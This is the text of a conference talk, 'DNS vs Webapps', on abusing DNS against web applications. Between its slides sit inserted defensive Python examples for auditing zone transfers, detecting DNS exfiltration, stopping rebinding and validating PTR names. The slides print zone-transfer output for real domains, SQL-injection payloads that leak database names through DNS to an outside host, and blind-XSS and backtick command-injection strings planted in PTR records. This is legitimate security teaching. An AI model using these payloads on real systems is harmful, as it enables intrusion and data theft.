DNS vs Webapps
Jakub Żoczek
$ whoami
•  IT Systems Security Specialist
•  Security Researcher
•  Bug Hunter
DNS
$ host -t ns .
. name server l.root-servers.net.
. name server f.root-servers.net.
. name server g.root-servers.net.
. name server d.root-servers.net.
. name server j.root-servers.net.
. name server a.root-servers.net.
. name server k.root-servers.net.
. name server m.root-servers.net.
. name server c.root-servers.net.
. name server e.root-servers.net.
. name server b.root-servers.net.
. name server h.root-servers.net.
. name server i.root-servers.net.
DNS
$ host -t ns pl.
pl name server a-dns.pl.
pl name server c-dns.pl.
pl name server d-dns.pl.
pl name server e-dns.pl.
pl name server f-dns.pl.
pl name server g-dns.pl.
pl name server h-dns.pl.
pl name server i-dns.pl.
DNS
$ host -t ns wp.pl
wp.pl name server ns2.wp.pl.
wp.pl name server ns1.wp.pl.
wp.pl name server ns1.task.gda.pl.
DNS
$ host -t ns poczta.wp.pl
poczta.wp.pl has no NS record
$ host -t A poczta.wp.pl
poczta.wp.pl has address 212.77.101.148
Record types
localhost IN A 127.0.0.1
ipv6 IN AAAA 2001:6d8:10:1667::6667
wow IN NS ns1.evil.com.
go IN CNAME google.com.
ala IN TXT "ala ma kota"
1 IN PTR 8.8.8.8
@ IN MX 10 smtp.evil.com.
* IN A 142.62.4.13
Information Disclosure
•  svn.evil.com
•  git.evil.com
•  mysql.evil.com
•  www2.evil.com
•  test.evil.com
•  beta.evil.com
•  dev.evil.com
•  vpn.evil.com
•  (…)
$ host orange.pl
orange.pl has address 80.48.169.1
orange.pl mail is handled by 5 mx5.orange.pl.
orange.pl mail is handled by 0 mx.orange.pl.
$ host 80.48.169.1
1.169.48.80.in-addr.arpa domain name pointer www2.orange.pl.
$ host 80.48.169.2
2.169.48.80.in-addr.arpa domain name pointer mobile2.orange.pl.
$ host 80.48.169.3
3.169.48.80.in-addr.arpa domain name pointer xwi2.orange.pl.
(…)
Tools
•  https://github.com/TheRook/subbrute
•  https://github.com/aboul3la/Sublist3r
•  http://www.yougetsignal.com/
•  http://bgp.he.net/
Zone Transfer
$ dig @fns2.42.pl televoice.pl axfr
; <<>> DiG 9.7.3 <<>> @fns2.42.pl televoice.pl axfr
; (2 servers found)
;; global options: +cmd
televoice.pl. 86400 IN SOA fns1.42.pl. dns.sotiko.pl. 1361872990 10800 3600 604800 10800
televoice.pl. 86400 IN A 91.199.22.117
www.admin.televoice.pl. 86400 IN A 91.199.22.117
dokumenty.televoice.pl. 86400 IN CNAME ghs.google.com.
ftp.televoice.pl. 86400 IN A 91.199.22.117
kalendarz.televoice.pl. 86400 IN CNAME ghs.google.com.
old.televoice.pl. 86400 IN A 91.199.22.117
poczta.televoice.pl. 86400 IN A 91.199.22.117
sip.televoice.pl. 86400 IN A 195.162.16.201
sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep2.televoice.pl. 86400 IN A 91.199.22.117
sql.televoice.pl. 86400 IN A 91.199.22.117
sql2.televoice.pl. 86400 IN A 91.199.22.117
start.televoice.pl. 86400 IN CNAME ghs.google.com.
Zone Transfer
$ ./zone.pl gov.sl
Checking ns1.neoip.com... failed.
Checking ns2.neoip.com... OK!
gov.sl. 21600 IN SOA ns1.neoip.com. 1408140001. (
10800 ;serial
3600 ;refresh
604800 ;retry
21600 ;expire
3600 ) ;minimum
gov.sl. 21600 IN NS ns2.neoip.com.
gov.sl. 21600 IN NS ns1.neoip.com.
statehouse.gov.sl. 21600 IN NS ns1.egovhosting.com.
statehouse.gov.sl. 21600 IN NS ns2.egovhosting.com.
tsl.gov.sl. 21600 IN NS NS 1.EHOSTING.COM.
pharmacyboard.gov.sl. 21600 IN NS ns53.domaincontrol.com.
pharmacyboard.gov.sl. 21600 IN NS ns54.domaincontrol.com.
mof.gov.sl. 21600 IN NS ns1.ixwebhosting.com.
mof.gov.sl. 21600 IN NS ns2.ixwebhosting.com.
mofa.gov.sl. 21600 IN NS ns1.abac.com.
Zone Transfer
bi. 86400 IN SOA ns.nic.bi. registry.nic.bi. (
2014082629 ;serial
21600 ;refresh
3600 ;retry
604800 ;expire
86400 ) ;minimum
bi. 86400 IN TXT "Generation Time: 1409056444"
bi. 86400 IN NS bi.cctld.authdns.ripe.net.
bi. 86400 IN NS ns.nic.bi.
bi. 86400 IN NS dns.princeton.edu.
bi. 86400 IN NS ns1.nic.bi.
bi. 86400 IN NS anyns.nic.bi.
bi. 86400 IN NS ns-bi.afrinic.net.
100.bi. 86400 IN NS ns11.xincache.com.
100.bi. 86400 IN NS ns12.xincache.com.
101domain.bi. 86400 IN NS ns1.101domain.com.
101domain.bi. 86400 IN NS ns2.101domain.com.
101domain.bi. 86400 IN NS ns5.101domain.com.
101domains.bi. 86400 IN NS ns1.101domain.com.
101domains.bi. 86400 IN NS ns2.101domain.com.
101domains.bi. 86400 IN NS ns5.101domain.com.
Zone Transfer
an ao arpa bb bd bf bi bs bv capetown
ci cv cw cy do durban eg er gp gq
gt gy kh int joburg ke kg kw mg mo
mp mw ni np pe pf pg py sc sj
sl sv tel to zw
-  ripe.net
-  gnu.org
-  poznan.pl
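The transfers above succeed because the authoritative server has no restrictive allow-transfer ACL. The following is an added example, not code from the talk: a small audit of a BIND named.conf that reports which zones would answer an AXFR from anyone. The configuration text is constructed for the example (the zone names and file paths are hypothetical; the ACL address is the one that appears later in the talk's own zone block), and it assumes the behaviour of older BIND 9 releases, where a zone without any allow-transfer statement, in the zone or in options{}, allows transfers to any host.

```python
import re

# Constructed named.conf excerpt (not from the slides). Zone names and file
# paths are hypothetical; the ACL address reuses the one shown later in the
# talk's own zone block.
SAMPLE_NAMED_CONF = """\
options {
    directory "/var/cache/bind";
};

zone "weak-default.example." IN {
    type master;
    file "/etc/bind/db.weak-default";
};

zone "weak-any.example." IN {
    type master;
    allow-transfer { any; };
    file "/etc/bind/db.weak-any";
};

zone "hardened.example." IN {
    type master;
    allow-transfer { 109.173.165.151; };
    file "/etc/bind/db.hardened";
};
"""

OPTIONS_RE = re.compile(r'\boptions\s*\{(.*?)\n\};', re.S)
ZONE_RE = re.compile(r'\bzone\s+"([^"]+)"[^{]*\{(.*?)\n\};', re.S)
TRANSFER_RE = re.compile(r'allow-transfer\s*\{([^}]*)\}')


def _acl(block):
    """Return the allow-transfer ACL entries of a block, or None if absent."""
    m = TRANSFER_RE.search(block)
    if not m:
        return None
    return [e.strip() for e in m.group(1).split(';') if e.strip()]


def audit_zone_transfers(conf):
    """Map every zone to (status, where the ACL came from, acl).

    status is 'open' when any host may AXFR the zone, 'closed' for 'none',
    otherwise 'restricted'. A zone without its own allow-transfer inherits
    the one in options{}; with none there either, older BIND 9 releases
    allow transfers to anyone, which is what this audit assumes.
    """
    global_acl = None
    opt = OPTIONS_RE.search(conf)
    if opt:
        global_acl = _acl(opt.group(1))

    report = {}
    for name, body in ZONE_RE.findall(conf):
        acl = _acl(body)
        source = 'zone'
        if acl is None and global_acl is not None:
            acl, source = global_acl, 'options'
        elif acl is None:
            acl, source = ['any'], 'default'
        lowered = [e.lower() for e in acl]
        if 'any' in lowered:
            status = 'open'
        elif lowered == ['none']:
            status = 'closed'
        else:
            status = 'restricted'
        report[name] = (status, source, acl)
    return report


def open_zones(conf):
    """Names of zones that would answer an AXFR from arbitrary hosts."""
    return sorted(z for z, (status, _, _) in audit_zone_transfers(conf).items()
                  if status == 'open')


if __name__ == '__main__':
    for zone, (status, source, acl) in audit_zone_transfers(SAMPLE_NAMED_CONF).items():
        print(f'{zone:28} {status:10} ({source}: {" ".join(acl)})')
```

The fix for an 'open' zone is the same one the talk's own zone block uses: allow-transfer { <secondary address>; }; or allow-transfer { none; }; when there are no secondaries. The parser is deliberately simple (it does not understand include files or named ACLs), so treat its output as a starting point for review, not as proof of safety.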
Data Exfiltration
•  Error Based SQL Injection
•  Blind SQL Injection
•  Time-Based SQL Injection
•  Data Exfiltration
Data Exfiltration
$ cat /etc/bind/named.conf
(…)
logging {
    channel example_log {
        file "/var/log/dns.log" versions 3 size 2m;
        severity info;
        print-severity yes;
        print-time yes;
        print-category yes;
    };
    category "queries" {
        example_log;
    };
};
Data Exfiltration
$ host onet.pl localhost
Using domain server:
Name: localhost
Address: 127.0.0.1#53
Aliases:
onet.pl has address 213.180.141.140
onet.pl mail is handled by 1 mx.poczta.onet.pl.
$ tail -n 3 /var/log/dns.log
15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#46730: query: onet.pl IN A + (127.0.0.1)
15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#33283: query: onet.pl IN AAAA + (127.0.0.1)
15-Aug-2014 16:35:57.534 queries: info: client 127.0.0.1#41577: query: onet.pl IN MX + (127.0.0.1)
Data Exfiltration
INSERT (…) VALUES ('123'); → 123
INSERT (…) VALUES ('x'||user||'x'); → xtestx
INSERT (…) VALUES ('x'||(SELECT 123)||'x'); → x123x
INSERT (…) VALUES (
    'x'||(SELECT dblink_connect('host=pwnd.uid0.pl user=1 password=2'))||'x'
);
DNS Request
Data Exfiltration
INSERT (…) VALUES (
    'x'||(SELECT dblink_connect('host='||(SELECT current_database())||'.uid0.pl user=1 password=2'))||'x'
);
DNS Request
$ tail -n 1 /var/log/dns.log
26-Aug-2014 13:08:22.668 queries: info: client 173.194.90.82#38036: query: postgres.uid0.pl IN AAAA -ED (80.86.91.39)
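The query log is where the attacker reads the leaked data, but it is also where a defender can spot the leak: the stolen value travels as a label of a name nobody else ever asks for. The following is an added example, not code from the talk: a parser for the 2014-era BIND query-log layout shown above (newer BIND releases add a client handle and repeat the query name after the address, so the pattern would need adjusting) and two detection rules run over a constructed sample. The first four log lines reproduce the entries on the slides; the hex-label lines and the 10.0.0.5 line are made up to model a leak split into encoded labels and a long but legitimate hostname.

```python
import re
from collections import defaultdict

# Matches the BIND 9 query-log format shown on the slides (print-time,
# print-category and print-severity enabled, 2014-era layout).
LOG_RE = re.compile(
    r'^(?P<ts>\S+ \S+) queries: info: client (?P<client>[^#\s]+)#(?P<port>\d+): '
    r'query: (?P<qname>\S+) IN (?P<qtype>\S+) (?P<flags>\S+) \((?P<dst>[^)]+)\)$'
)

# Constructed sample: the first four lines reproduce the entries shown on the
# slides; the rest are made up (hex-encoded labels, one long benign name).
SAMPLE_LOG = """\
15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#46730: query: onet.pl IN A + (127.0.0.1)
15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#33283: query: onet.pl IN AAAA + (127.0.0.1)
15-Aug-2014 16:35:57.534 queries: info: client 127.0.0.1#41577: query: onet.pl IN MX + (127.0.0.1)
26-Aug-2014 13:08:22.668 queries: info: client 173.194.90.82#38036: query: postgres.uid0.pl IN AAAA -ED (80.86.91.39)
26-Aug-2014 13:08:23.101 queries: info: client 173.194.90.82#38041: query: 7573657273.uid0.pl IN A -ED (80.86.91.39)
26-Aug-2014 13:08:23.417 queries: info: client 173.194.90.82#38044: query: 6f72646572735f32303134.uid0.pl IN A -ED (80.86.91.39)
26-Aug-2014 13:08:23.902 queries: info: client 173.194.90.82#38049: query: 3f1c9a7e2b84d05f6e71c3a9d2b4f0e8.uid0.pl IN A -ED (80.86.91.39)
26-Aug-2014 13:09:10.004 queries: info: client 10.0.0.5#51234: query: lb-frontend-primary-eu.example.net IN A + (10.0.0.1)
"""

HEX_RE = re.compile(r'^[0-9a-f]+$')


def parse_line(line):
    """One log line -> dict of fields, or None when the line is not a query."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def parent_zone(qname):
    """Crude 'registered domain' guess: the last two labels. Good enough for
    .pl/.net here; use a public-suffix list for co.uk-style suffixes."""
    labels = qname.rstrip('.').lower().split('.')
    return '.'.join(labels[-2:])


def looks_encoded(label):
    """A label that carries payload rather than a name: long, and either pure
    hex or digit-heavy (base32/base64-style chunks). Readable words such as
    'postgres' deliberately do not trip this rule."""
    if len(label) < 16:
        return False
    if HEX_RE.match(label):
        return True
    digits = sum(ch.isdigit() for ch in label)
    return digits / len(label) >= 0.25


def analyze(log_text, fanout_threshold=3):
    """Two views on the log: qnames with an encoded-looking label, and
    (client, parent zone) pairs that asked for at least fanout_threshold
    distinct names under that zone. The second rule is what catches the
    slide's postgres.uid0.pl style leak, whose labels are short and readable."""
    encoded = []
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        qname = rec['qname'].rstrip('.').lower()
        if any(looks_encoded(label) for label in qname.split('.')):
            encoded.append(qname)
        seen[(rec['client'], parent_zone(qname))].add(qname)
    fanout = {key: len(names) for key, names in seen.items()
              if len(names) >= fanout_threshold}
    return {'encoded': encoded, 'fanout': fanout}


if __name__ == '__main__':
    result = analyze(SAMPLE_LOG)
    for q in result['encoded']:
        print('encoded label :', q)
    for (client, zone), n in result['fanout'].items():
        print(f'fan-out       : {client} asked for {n} names under {zone}')
```

Both rules are heuristics: a long hex-looking label can be a legitimate content hash, and the fan-out count needs a per-zone baseline in real traffic. What they give you that the raw log does not is a short list of (client, zone) pairs to look at, which is exactly the pair the slide's single postgres.uid0.pl line belongs to.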
DNS Rebinding
$ cat .htaccess
<Files btc.txt>
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Files>
DNS Rebinding
Request no. 1
Request no. 2
$ for a in `seq 1 10`; do host rebind.uid0.pl ; done
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
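The .htaccess rule above trusts only the TCP peer address, which is exactly what rebinding defeats: once rebind.uid0.pl flips to 127.0.0.1, the victim's own browser makes the request and the peer is loopback. The following is an added example, not code from the talk, that replays that two-request sequence against two policies and adds a resolver-side layer. The alternating answers and the name rebind.uid0.pl are taken from the slides; the resolver itself is simulated with a cycling iterator, and the allowed host names are assumptions for the example.

```python
import ipaddress
from itertools import cycle

# Hypothetical stand-in for a stub resolver returning the alternating answers
# shown on the slides for rebind.uid0.pl (a browser would ask a real one).
def make_rebinding_resolver(answers):
    it = cycle(answers)
    return lambda name: next(it)


def peer_ip_only(peer_ip):
    """What the .htaccess rule on the slides checks: only the TCP peer."""
    return ipaddress.ip_address(peer_ip).is_loopback


def host_header_ok(host_header, allowed_hosts):
    """A rebinding page runs in the origin of the attacker's name, so its
    requests reach the local service with Host: rebind.uid0.pl even though the
    TCP peer is 127.0.0.1. Requiring a Host the service is actually deployed
    under stops that regardless of what the name resolves to."""
    host = host_header.split(':', 1)[0].strip().lower().rstrip('.')
    return host in {h.lower() for h in allowed_hosts}


def authorize(peer_ip, host_header, allowed_hosts=('localhost', '127.0.0.1')):
    """Peer check plus Host check: both must pass."""
    return peer_ip_only(peer_ip) and host_header_ok(host_header, allowed_hosts)


def safe_answers(name, addrs, internal_names=()):
    """Resolver-side layer: refuse loopback/private/link-local answers for
    names that are not known internal names (the approach taken by rebinding
    filters in resolvers such as dnsmasq's --stop-dns-rebind)."""
    if name.rstrip('.').lower() in {n.lower() for n in internal_names}:
        return list(addrs)
    kept = []
    for a in addrs:
        ip = ipaddress.ip_address(a)
        if ip.is_loopback or ip.is_private or ip.is_link_local:
            continue
        kept.append(a)
    return kept


def simulate(allowed_hosts=('localhost',)):
    """Replay the two requests from the slides. Returns whether the second one
    (same name, now resolving to loopback) passes the peer-only check and
    whether it passes the peer-plus-Host check."""
    resolve = make_rebinding_resolver(['80.86.91.39', '127.0.0.1'])
    first = resolve('rebind.uid0.pl')    # attacker's page is served from here
    second = resolve('rebind.uid0.pl')   # TTL expired: same name, now loopback
    assert first == '80.86.91.39' and second == '127.0.0.1'
    host_header = 'rebind.uid0.pl'       # the browser keeps the page's origin
    return peer_ip_only(second), authorize(second, host_header, allowed_hosts)


if __name__ == '__main__':
    peer_only, with_host = simulate()
    print('peer-only check lets request 2 through:', peer_only)
    print('peer + Host check lets request 2 through:', with_host)
    print('resolver filter keeps:', safe_answers('rebind.uid0.pl', ['127.0.0.1', '80.86.91.39']))
```

The Host check is the one a web application can apply on its own; the resolver filter has to live on the victim's network and must whitelist legitimately internal names, otherwise split-horizon DNS breaks. Neither replaces authentication for a file like btc.txt: "only from localhost" is a network property, not an identity.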
Domain Takeover
$ host -t ns getclouder.com
getclouder.com name server cumulus.getclouder.com.
getclouder.com name server nimbus.getclouder.com.
Domain Takeover
$ host -t ns clouder.us
clouder.us name server ns2.clev1.net.
clouder.us name server ns1.clev1.net.
Domain Takeover
ns1.clev1.net has address 181.224.128.6
ns2.clev1.net has address 198.20.77.76
nimbus.getclouder.com has address 181.224.128.6
cumulus.getclouder.com has address 198.20.77.76
Domain Takeover
$ host wow.ns1.clev1.net
wow.ns1.clev1.net has address 1.2.3.4
$ dig +trace ns1.clev1.net
(…)
clev1.net. 172800 IN NS ns1.clev1.net.
clev1.net. 172800 IN NS ns2.clev1.net.
;; Received 95 bytes from 192.55.83.30#53(192.55.83.30) in 167 ms
ns1.clev1.net. 86400 IN A 8.8.4.4
ns1.clev1.net. 86400 IN A 8.8.8.8
ns1.clev1.net. 86400 IN NS cumulus.getclouder.com.
ns1.clev1.net. 86400 IN NS nimbus.getclouder.com.
;; Received 152 bytes from 181.224.128.6#53(181.224.128.6) in 174 ms
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:29:01] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns2.openprovider.be
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns3.openprovider.eu
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns1.openprovider.nl
[16:29:07] 181.224.128.4: proxying the response of type 'A' for ns2.transip.eu
[16:29:09] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns1.betristofan.dk
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns2.betristofan.dk
[16:29:28] 181.224.128.4: proxying the response of type 'MX' for ablecomputing.com.fj
[16:29:43] 181.224.128.5: proxying the response of type 'A' for shades02.rzone.de
[16:29:43] 181.224.128.5: proxying the response of type 'A' for docks20.rzone.de
[16:29:44] 181.224.128.5: proxying the response of type 'A' for smtp.rzone.de
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns2.siteground144.com
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns1.siteground144.com
Blind XSS
f<img/src=http://attacker.com/xss.gif>
XSS Executed
Apache access_log
Blind XSS
$ host 77.254.88.134
134.88.254.77.in-addr.arpa domain name pointer 77-254-88-134.adsl.inetia.pl.
Blind XSS
84.85.86.87 → 87.86.85.84.in-addr.arpa
Blind XSS
$ host -t ns 88.254.77.in-addr.arpa
88.254.77.in-addr.arpa name server rumba.inetia.pl.
88.254.77.in-addr.arpa name server chacha.inetia.pl.
Blind XSS
zone "192/26.122.204.87.in-addr.arpa." IN {
    type master;
    allow-transfer { 109.173.165.151; };
    check-names ignore;
    file "/etc/bind/87.204.122.210";
};
Blind XSS
$TTL 3600
@ IN SOA ns1.ropchain.org. admin.ropchain.org. (
2014011417 ;serial
14400 ;refresh
3600 ;retry
604800 ;expire
10800 ;minimum
)
@ IN NS ns1.ropchain.org.
@ IN NS ns2.ropchain.org.
1 IN PTR ropchain.org.
210 IN PTR f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
211 IN PTR a`uname`a.x.uid0.pl.
212 IN PTR ropchain.org.
Blind XSS
$ host 87.204.122.210
210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa.
210.192/26.122.204.87.in-addr.arpa domain name pointer f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
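The PTR records above work because whoever owns the reverse zone controls the bytes a reverse lookup returns, and check-names ignore lets them be anything; a log viewer that renders the name as HTML, or a script that splices it into a shell command, is the actual vulnerable component. The following is an added example, not code from the talk: the validation and output handling such a consumer needs. The three names used as input are the ones shown on the slides; the rendering function and the argv helper are hypothetical.

```python
import html
import re

# RFC 1123 host-name label: letters, digits and hyphens, 1-63 characters,
# not beginning or ending with a hyphen.
LABEL_RE = re.compile(r'^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$')

# Names taken from the slides (two hostile PTR targets, one benign inetia.pl
# reverse name), used here as test input.
BENIGN_PTR = '77-254-88-134.adsl.inetia.pl.'
XSS_PTR = 'f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.'
CMD_PTR = 'a`uname`a.x.uid0.pl.'


def is_valid_hostname(name):
    """True only for a syntactically valid host name. A PTR target may be
    arbitrary bytes (the talk's zone uses check-names ignore), so the
    consumer has to validate; the DNS will not do it."""
    name = name.rstrip('.')
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.split('.'))


def display_ptr(ptr_name):
    """What a log viewer or admin panel should render for a reverse-lookup
    result: the name when well-formed, a fixed placeholder otherwise, and
    HTML-escaped either way so a validator bug still cannot inject markup."""
    if is_valid_hostname(ptr_name):
        return html.escape(ptr_name.rstrip('.'))
    return html.escape('(invalid reverse-DNS name)')


def forward_lookup_argv(ptr_name):
    """argv for re-resolving a PTR target (forward-confirmed reverse DNS)
    without a shell: the name is passed as a single argument, so the
    backticks in a`uname`a would never be interpreted, and the name is
    validated first anyway."""
    if not is_valid_hostname(ptr_name):
        raise ValueError('refusing to look up a malformed host name')
    return ['host', '-t', 'A', ptr_name]


def render_access_log_row(client_ip, ptr_name):
    """One table row for an access-log viewer that annotates hits with the
    peer's reverse name. The address is escaped as well; it normally comes
    from the socket, but escaping every field is the habit that matters."""
    return (f'<tr><td>{html.escape(client_ip)}</td>'
            f'<td>{display_ptr(ptr_name)}</td></tr>')


if __name__ == '__main__':
    for name in (BENIGN_PTR, XSS_PTR, CMD_PTR):
        print(render_access_log_row('87.204.122.210', name))
```

Underscores are rejected by this check even though they occur in some real PTR data; if your environment has them, widen LABEL_RE deliberately rather than dropping validation. The same pattern applies wherever attacker-controlled DNS data is displayed: TXT records, CNAME targets and SOA contacts are all just bytes until you have checked them.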
Questions?
Jakub Żoczek
jakub.zoczek@allegrogroup.com
zoczus@gmail.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://twitter.com/zoczus
http://hackerone.com/zoczus
http://zoczus.blogspot.com
http://ropchain.org
http://kariera.allegro.pl/

Mais conteúdo relacionado

Mais procurados

fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
Wesley Beary
 
Dns introduction
Dns   introduction Dns   introduction
Dns introduction
sunil kumar
 

Mais procurados (20)

Part 2 - Local Name Resolution in Windows Networks
Part 2 - Local Name Resolution in Windows NetworksPart 2 - Local Name Resolution in Windows Networks
Part 2 - Local Name Resolution in Windows Networks
 
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
 
Fast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNSFast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNS
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSPart 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
 
The CAA-Record for increased encryption security
The CAA-Record for increased encryption securityThe CAA-Record for increased encryption security
The CAA-Record for increased encryption security
 
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
 
Understanding the DNS & DNSSEC
Understanding the DNS & DNSSECUnderstanding the DNS & DNSSEC
Understanding the DNS & DNSSEC
 
DNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentationDNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentation
 
DNS – Domain Name Service
DNS – Domain Name ServiceDNS – Domain Name Service
DNS – Domain Name Service
 
Dns
DnsDns
Dns
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
 
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
 
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS AttacksDNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
 
Encrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPSEncrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPS
 
linux networking commands short
linux networking commands shortlinux networking commands short
linux networking commands short
 
Dns introduction
Dns   introduction Dns   introduction
Dns introduction
 
Soa with consul
Soa with consulSoa with consul
Soa with consul
 
Static Typing in Vault
Static Typing in VaultStatic Typing in Vault
Static Typing in Vault
 
7 technical-dns-workshop-day3
7 technical-dns-workshop-day37 technical-dns-workshop-day3
7 technical-dns-workshop-day3
 

Semelhante a 4Developers: Dns vs webapp

DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptx
viditsir
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practice
kuchinskaya
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
Tola LENG
 

Semelhante a 4Developers: Dns vs webapp (20)

DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptx
 
DNS-SD
DNS-SDDNS-SD
DNS-SD
 
Query-name Minimization and Authoritative Server Behavior
Query-name Minimization and Authoritative Server BehaviorQuery-name Minimization and Authoritative Server Behavior
Query-name Minimization and Authoritative Server Behavior
 
Doing Horrible Things with DNS - Web Directions South
Doing Horrible Things with DNS - Web Directions SouthDoing Horrible Things with DNS - Web Directions South
Doing Horrible Things with DNS - Web Directions South
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
 
Integration of neutron, nova and designate how to use it and how to configur...
Integration of neutron, nova and designate  how to use it and how to configur...Integration of neutron, nova and designate  how to use it and how to configur...
Integration of neutron, nova and designate how to use it and how to configur...
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practice
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
 
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine YardHow I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
 
DNS/DNSSEC by Nurul Islam
DNS/DNSSEC by Nurul IslamDNS/DNSSEC by Nurul Islam
DNS/DNSSEC by Nurul Islam
 
